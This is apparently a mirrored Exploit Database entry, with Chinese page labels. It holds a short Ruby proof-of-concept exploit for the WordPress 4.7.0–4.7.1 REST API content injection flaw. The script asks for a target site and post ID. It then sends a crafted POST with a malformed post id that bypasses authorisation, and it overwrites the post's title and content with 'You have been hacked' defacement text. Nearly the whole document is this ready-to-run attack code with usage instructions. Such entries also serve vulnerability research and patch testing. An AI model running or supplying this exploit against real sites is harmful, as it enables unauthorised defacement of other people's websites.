WordPress Core 4.7.0/4.7.1 – Content Injection (Ruby)

• Exploit Database
• 17 阅读

• 作者： Harsh Jaiswal
  日期： 2017-02-02
• 类别：

  • webapps
  平台：

  • linux
• 来源：https://www.exploit-db.com/exploits/41224/

• # Exploit Title: WP Content Injection
  # Date: 31 Jan' 2017
  # Exploit Author: Harsh Jaiswal
  # Vendor Homepage: http://wordpress.org
  # Version: WordPress 4.7 - 4.7.1 (Patched in 4.7.2)
  # Tested on: Backbox ubuntu Linux
  # Based on https://blog.sucuri.net/2017/02/content-injection-vulnerability-wordpress-rest-api.html
  # Credits : Marc, Sucuri, Brute
  # usage : gem install rest-client 
  # Lang : Ruby
  
  
  require 'rest-client'
  require 'json'
  puts "Enter Target URI (With wp directory)"
  targeturi = gets.chomp
  puts "Enter Post ID"
  postid = gets.chomp.to_i
  response = RestClient.post(
  "#{targeturi}/index.php/wp-json/wp/v2/posts/#{postid}",
  {
  
  "id" => "#{postid}justrawdata",
  "title" => "You have been hacked",
  "content" => "Hacked please update your wordpress version"
  
  
  }.to_json,
  :content_type => :json,
  :accept => :json
  ) {|response, request, result| response }
  if(response.code == 200)
  
  puts "Done! '#{targeturi}/index.php?p=#{postid}'"
  
  
  else
  puts "This site is not Vulnerable"
  end